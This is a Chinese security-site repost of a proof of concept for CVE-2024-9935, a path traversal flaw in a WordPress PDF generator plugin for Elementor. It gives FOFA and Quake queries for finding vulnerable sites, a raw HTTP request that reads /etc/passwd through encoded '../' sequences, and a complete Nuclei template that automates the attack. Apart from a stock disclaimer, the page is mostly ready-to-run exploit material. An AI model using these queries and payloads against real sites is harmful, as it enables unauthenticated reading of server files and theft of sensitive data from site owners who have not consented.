CVE-2024-9935 PoC

admin 2024年12月5日21:18:31评论12 views字数 2396阅读7分59秒阅读模式
CVE-2024-9935

WordPress 的 Elementor Page Builder 插件的 PDF 生成器插件在 1.7.5 之前的所有版本中都容易受到路径遍历的攻击,包括 1.7.5 rtw_pgaepb_dwnld_pdf() 函数。这使得未经身份验证的攻击者能够读取服务器上任意文件的内容,其中可能包含敏感信息。

漏洞信息

混子Hacker    

01

资产测绘

fofa: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"Quakebody:"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
CVE-2024-9935 PoC
CVE-2024-9935 PoC
混子Hacker

02

漏洞复现

GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1Host: xxxAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
CVE-2024-9935 PoC
混子Hacker

03

Nuclei Poc

id: CVE-2024-9935info:  name: PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Arbitrary File Download  author: s4e-io  severity: high  description: |    The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.  reference:    - https://github.com/RandomRobbieBF/CVE-2024-9935    - https://plugins.trac.wordpress.org/browser/pdf-generator-addon-for-elementor-page-builder/trunk/public/class-pdf-generator-addon-for-elementor-page-builder-public.php#L133    - https://www.wordfence.com/threat-intel/vulnerabilities/id/36daf2af-1db3-4b35-8849-480212660b2f?source=cve    - https://nvd.nist.gov/vuln/detail/CVE-2024-9935  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N    cvss-score: 7.5    cve-id: CVE-2024-9935    cwe-id: CWE-22    epss-score: 0.0009    epss-percentile: 0.39758  metadata:    verified: true    max-request: 2    vendor: RedefiningTheWeb    product: pdf-generator-addon-for-elementor-page-builder    framework: wordpress    fofa-query: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"  tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,pdf-generatorflow: http(1) && http(2)http:  - raw:      - |        GET / HTTP/1.1        Host: {{Hostname}}    matchers:      - type: dsl        dsl:          - 'contains(body, "/wp-content/plugins/pdf-generator-addon-for-elementor-page-builder")'        internal: true  - raw:      - |        GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1        Host: {{Hostname}}    matchers:      - type: dsl        dsl:          - regex('root:.*:0:0:', body)          - contains(header, "application/pdf")          - status_code == 200        condition: and

 

原文始发于微信公众号(混子Hacker):【漏洞复现】CVE-2024-9935

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月5日21:18:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-9935 PoChttp://cn-sec.com/archives/3468937.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息